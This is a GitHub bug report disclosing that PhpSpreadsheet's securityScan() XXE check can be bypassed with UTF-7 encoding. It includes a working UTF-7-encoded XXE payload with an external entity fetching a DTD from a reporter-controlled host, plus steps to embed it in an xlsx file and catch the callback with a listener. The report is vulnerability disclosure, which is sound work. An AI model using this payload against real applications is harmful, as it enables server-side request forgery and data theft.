XXE Vulnerability

This is: - [X] a bug report - [ ] a feature request - [ ] not a usage question (ask them on https://stackoverflow.com/questions/tagged/phpspreadsheet or https://gitter.im/PHPOffice/PhpSpreadsheet) What is the expected behavior? The securityScan() function is used to prevent XXE attacks. What is the current behavior? The securityScan() function can be bypassed by using UTF-7 encoding. What are the steps to reproduce? /Details suppressed until after patch was released/ Replace the IP address and port 127.0.0.1:8080 with something you control. +ADwAIQ-DOCTYPE xmlrootname +AFsAPAAh-ENTITY +ACU aaa SYSTEM +ACI-http://127.0.0.1:8080/ext. dtd+ACIAPgAl-aaa+ADsAJQ-ccc+ADsAJQ-ddd+ADsAXQA+ sheet1.xml Replace sheet1.xml in your xlsx file with the one above and re-zip the excel sheet. I’ve attached an xlsx file that makes a request as configured above. File exploit-localhost.xlsx Set up a listener either with Python, netcat, etc. locally and watch for a request that will be made once the xlsx is read by the library. Please let me know if you would like more details on generating the xlsx file or if you need any clarification about the issue. Which versions of PhpSpreadsheet and PHP are affected? I believe it affects all versions. The text was updated successfully, but these errors were encountered: 👍 7 ATouhou, MrHaroldA, malouf-erfan, NinoSkopac, kevin-valerio, adrienbrignon, and artfulrobot reacted with thumbs up emoji All reactions 👍 7 reactions